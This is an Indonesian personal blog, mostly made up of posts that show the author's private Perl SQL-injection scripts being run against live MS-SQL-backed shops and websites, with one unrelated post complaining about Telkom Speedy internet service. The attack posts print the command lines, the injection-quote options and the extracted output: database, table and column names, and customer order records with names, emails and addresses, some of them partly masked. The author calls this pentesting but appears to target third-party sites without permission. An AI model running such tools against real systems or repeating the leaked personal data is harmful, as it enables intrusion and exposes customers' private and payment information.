Lanjutan PenTest SQL Injection against MS-SQL Server (Bagian III)

Just another my PRIVATE tool : dump_vpasp.pl .
Skrip ini memiliki kemampuan untuk men-dump secara otomatis
isi dari database (yg penting saja tentunya) dari VPASP.
Seperti yang anda telah ketahui, VPASP adalah aplikasi e-commerce
berbasiskan ASP dengan backend database MS-SQL Server,
di mana sebagian versinya masih menyisakan bug sql injection.

SHOW TIME :

E:\data\sqlperl\baru>dump_vpasp.pl -t "http://XXXXXXXX-XXXXX.com/shopexd.asp?id=
" -p 2 -l 10

*********************************
SQL INJECTION AUTOMATION
trying to retrieve DB content !!!

by iko94(iko94@yahoo.com)
www.geocities.com/iko94

*********************************

http://XXXXXXXX-XXXXX.com/shopexd.asp?id=
Format : XXXXXXX/XXXXX/XXXXXXXXXXX/ofirstname/olastname/oemail/ocity/oaddress/op
ostcode/ostate/ocountry/ophone/ocompany/ocardtype/XXXXXXX/XXXXXXXXX/ocardexpires
/ocardaddress/oprocessed/opaymethod/XXXXXXXXXXXXXX
[1] : 63664/Oct 23 2006 12:00AM/14.40/Zsolt/Koszik/zskoszik@freemail.hu/Biator
bagy/Szel u 6124/2051/NULL/HU/XXXXXXXXXXX/NULL
/Verisign - Pending/NULL/NULL/NULL/NULL/0/0/NULL
........snip...........
[10] : 63655/Oct 23 2006 12:00AM/32.45/Rudolf/Arenstorff/rudolf.arenstorff@sieme
ns.com/vienna/Kefedergrundgasse 3B/2/8/1210/Austria/AT/XXXXXXXXXXXXXXX/NULL
/Verisign/NULL/XXXXXXXXXXXX/NULL/NULL/0/0/XXXXXX
++++++++++++++++++++

E:\data\sqlperl\baru>

***FRESH*** ???

Fasilitas :
[+] seperti biasa, bisa memilih target dan jumlah quotenya
[+] bisa memilih berapa baris transaksi terakhir yang terjadi (***istimewa***),
contoh di atas memilih 10 baris terakhir dari transaksi yg terjadi

Ingat... ingat...
Skrip ini hanya untuk tujuan pendidikan saja, segala kerusakan yg diakibatkannya
tidak menjadi tanggungjawab penulis...
Sebagian dari output program di atas, penulis ganti dengan karakter XXX dengan
alasan keamanan.

Seperti biasa juga, skrip ini masih bersifat PRIVATE, yg mungkin akan didistribusikan
untuk kalangan terbatas...

Kendi, lo kebagian atu nih... (ditunggu aje...)

[+] THX to GOD, for everything...
[+] THX to Kendi, for the core alternative query

[EOF]

Lanjutan PenTest SQL Injection against MS-SQL Server

Setelah mengetahui nama-nama tabel beserta kolomnya, maka iseng-iseng kita bisa melihat nama-nama databasenya :

E:\data\sqlperl\baru>sqli_loop_multi.pl -t "http://www.XXXXX.web.id/notice_news_
content.asp?id=" -p 2

*********************************
SQL INJECTION AUTOMATION
trying to retrieve DB content !!!

by iko94(iko94@yahoo.com)
www.geocities.com/iko94

use : E:\data\sqlperl\baru\sqli_loop_multi.pl -t "target_path" -p pilihan
contoh : E:\data\sqlperl\baru\sqli_loop_multi.pl -t "http://www.XXXXX.web.id/not
ice_news_content.asp?id=" -p 2

ket :
-t target_path
-p pilihan


pilihan :
0 ==> tidak ada quote di depan injek
1 ==> satu single quote di depan injek
2 ==> dua single quote di depan injek

*********************************

http://www.XXXXX.web.id/notice_news_content.asp?id=
[+] hasil : 1|master
[+] hasil : 2|tempdb
[+] hasil : 3|model
[+] hasil : 4|msdb
[+] hasil : 5|pubs
[+] hasil : 6|Northwind
[+] hasil : 7|o2jam
gak match lagi
dah selesai
++++++++++++++
dah selesai at E:\data\sqlperl\baru\sqli_loop_multi.pl line 147.

E:\data\sqlperl\baru>


xixixixixixi, wah, baik sekali MS-SQL Server mau memberitahu kita apa saja nama databasenya...
Kendi... skrip-skrip ini hampir mencapai final release (but still PRIVATE) ...
NEXT TARGET : skrip php dengan backend database MySQL...

[+] THX To GOD , for everything...

[EOF]

Speedy oh Speedy.....

Setelah membaca detikinet , saya merasa bersyukur, bahwa sampai detik ini saya belum pernah sekalipun pakai Telkom Speedy.
Berbagai keluhan konsumen, mulai dari lambatnya akses yang memakai speedy, amburadulnya sistem billing speedy, dudulsnya para CS 147, sampai dengan ketidaksesuaian antara apa yang mereka bayar dengan kualitas yang seharusnya mereka terima (bayar broadband dapatnya dial-up).

Berikut rangkuman berita tentang speedy di detikinet :
- Loss 80%, speedy ala bekicot
- Speedy, Bayar Broadband dengan Kualitas Dial-Up
- Konsumen Merasa Dibodohi 'Meteran' Speedy
- Speedy Kapan Beres? Hanya Tuhan yang Tahu...
- Speedy Bermasalah, 147 Berulah
- Speedy Lemot, Trader Valas Merugi
- Busyet Tagihan Speedy Nyasar!
- Duh Speedy, Ekspatriat pun Gregetan

Sampai akhirnya ada respon dari pihak Telkom :
- Telkom Speedy: Kami Mohon Maaf

Tidak itu saja, detikinet juga menerima khusus keluhan para pelanggan speedy (redaksi[at]detikINET[dot]com), artinya keluhan-keluhan konsumen speedy pasti lebih banyak daripada yang ada di bagian komentar berita tersebut.

Apakah kasus Telkom Speedy ini mencerminkan pelayanan dari BUMN di negeri kita ? (sok oratoris...)
Tentu anda sudah tahu sendiri jawabannya ... :)

Saya hanya bisa berdoa, semoga Pemerintah tahu kebijaksanaan apa yang harus diambilnya.....

PenTest : SQL Injection Tools (against MS-SQL Server)

Iseng-iseng buka-buka arsip lama...
Ada dua skrip perl yg bisa digunakan untuk penetration test, tepatnya SQL Injection Tools, khusus untuk MS-SQL Server :)
Skrip-skrip ini masih bersifat PRIVATE VERSION !!!
Gak tau yach, kenapa kok aku merasa sayang menjadikannya sebagai PUBLIC VERSION...
Versi terakhir dari skrip ini, telah mengalami beberapa perbaikan :

1. Pada bagian LWP telah diperbaiki, sehingga lebih cepat responnya
2. Pada loop2nya, agar bisa digunakan untuk parsing hasilnya lebih bagus
3. Pada parsing dari respon LWP, thx to kendi aka fuzk3 yang telah membantu mengetesnya
4. Pada file logging nya, agar file log dari skrip pertama langsung bisa digunakan oleh skrip ke dua
5. Pada query SQL nya, agar bisa digunakan untuk looping dan parsing, thx to Bang TioEuy yang telah memberikan query ampuh yang merupakan inti dari 2 skrip ini

Skrip pertama bertugas untuk men-dump nama-nama tabel di database tsb, sedang skrip ke dua bertugas men-dump nama-nama kolom nya.
Lha yg bertugas untuk men-dump isi tabel nya mana ??? Dumping isi tabel bisa dilakukan secara manual saja, karena kita tidak memerlukan isi secara keseluruhan bukan ? Hanya bagian-bagian tertentu saja dari tabel yang akan kita extract secara manual, lagian bandwith masih mahal bok...

Berikut petikan skrip pertama :

b1ma@b1ma-desktop:~/dataku/sqlperl$ ./sqli_loop_tbl.pl -t "http://www.imageXXXXXX.com/AB1235000equick/shopdisplayproducts.asp?id=" -p 2

*********************************
SQL INJECTION AUTOMATION
trying to retrieve DB content !!!

by iko94(iko94@yahoo.com)
www.geocities.com/iko94

use : ./sqli_loop_tbl.pl -t "target_path" -p pilihan
contoh : ./sqli_loop_tbl.pl -t "http://www.o2ZZZZZ.web.id/notice_news_content.asp?id=" -p 1

ket :
-t target_path
-p pilihan


pilihan :
1 ==> satu single quote di depan injek
2 ==> dua single quote di depan injek

*********************************

http://www.imageXXXXXX.com/AB1235000equick/shopdisplayproducts.asp?id=
[+] tabel : 5575058|orders
[+] tabel : 21575115|ordertracking
[+] tabel : 37575172|prodcategories
...snip...

Petikan skrip ke dua :
b1ma@b1ma-desktop:~/dataku/sqlperl$ ./sqli_loop_row.pl -t "http://www.imageXXXXXX.com/AB1235000equick/shopdisplayproducts.asp?id=" -p 2

*********************************
SQL INJECTION AUTOMATION
trying to retrieve DB content !!!

by iko94(iko94@yahoo.com)
www.geocities.com/iko94

use : ./sqli_loop_row.pl -t "target_path" -p pilihan
contoh : ./sqli_loop_row.pl -t "http://www.o2ZZZZZ.web.id/notice_news_content.asp?id=" -p 1

ket :
-t target_path
-p pilihan


pilihan :
1 ==> satu single quote di depan injek
2 ==> dua single quote di depan injek

*********************************

http://www.imageXXXXXX.com/AB1235000equick/shopdisplayproducts.asp?id=
Tabel : orders
[+] row : 1|orderid
[+] row : 2|ocustomerid
[+] row : 3|odate
[+] row : 4|orderamount
[+] row : 5|ofirstname
[+] row : 6|olastname
[+] row : 7|oemail
[+] row : 8|oaddress
[+] row : 9|ocity
[+] row : 10|opostcode

Hasil tidak cocok !
gak match lagi2
++++++++++++++++++++
Tabel : ordertracking
[+] row : 1|trackid
[+] row : 2|orderid
[+] row : 3|trackcomment
[+] row : 4|trackname
[+] row : 5|trackdate
[+] row : 6|tracktime
[+] row : 7|trackview
[+] row : 8|trackemail
[+] row : 9|trackother

Hasil tidak cocok !
gak match lagi2
++++++++++++++++++++
Tabel : prodcategories
[+] row : 1|id
[+] row : 2|intcategoryid
[+] row : 3|intcatalogid

Hasil tidak cocok !
gak match lagi2
++++++++++++++++++++
...snip...

Kemudian kita lihat file log nya :
b1ma@b1ma-desktop:~/dataku/sqlperl$ ls
sqliloop.log sqlilooprow.log sqlilooptbl.log sqlilooptblrow.log
b1ma@b1ma-desktop:~/dataku/sqlperl$ cat sqlilooptbl.log
5575058|orders
21575115|ordertracking
37575172|prodcategories
53575229|prodfeatures
69575286|products
85575343|projects
101575400|quantitydiscounts
117575457|registrant
...snip...

b1ma@b1ma-desktop:~/dataku/sqlperl$ cat sqlilooptblrow.log
orders | 1|orderid
orders | 2|ocustomerid
orders | 3|odate
orders | 4|orderamount
...snip...
ordertracking | 1|trackid
ordertracking | 2|orderid
ordertracking | 3|trackcomment
ordertracking | 4|trackname
...snip...
prodcategories | 1|id
prodcategories | 2|intcategoryid
prodcategories | 3|intcatalogid
...snip...
prodfeatures | 1|id
prodfeatures | 2|featurenum
prodfeatures | 3|featurecaption
prodfeatures | 4|featurename
...snip...
products | 1|catalogid
products | 2|ccode
products | 3|cname
products | 4|cdescription
products | 5|cprice
...snip...

Wah, kebanyakan snip dech...
Abiss panjang banget sich :)

Saya kira cukup sekian laporan langsung dari blog saya, tak lupa kritik, saran, cemo'ohan, wishlist, TODO bisa anda kirimkan ke iko94 [at] yahoo [dot] com


SHOUTz to :

1. my beloved wife
2. all ppl in #1stlink @ dalnet
3. TioEuy && kendi
4. Bosen's family (Alpret, boeboe)
5. all ppl in #neoteker @ dalnet
6. all of my big family
7. my old 686 machine
8. ubuntu && debian
9. linus && linux
10. larry wall && perl

Kata-kata mutiara hari ini :
The Perl motto is "There’s more than one way to do it." Divining how many more is left as an exercise to the reader.
The three principal virtues of a programmer are Laziness, Impatience, and Hubris. See the Camel Book for why.
dikutip dari manual perl.

THX GOD for everything...

[EOF]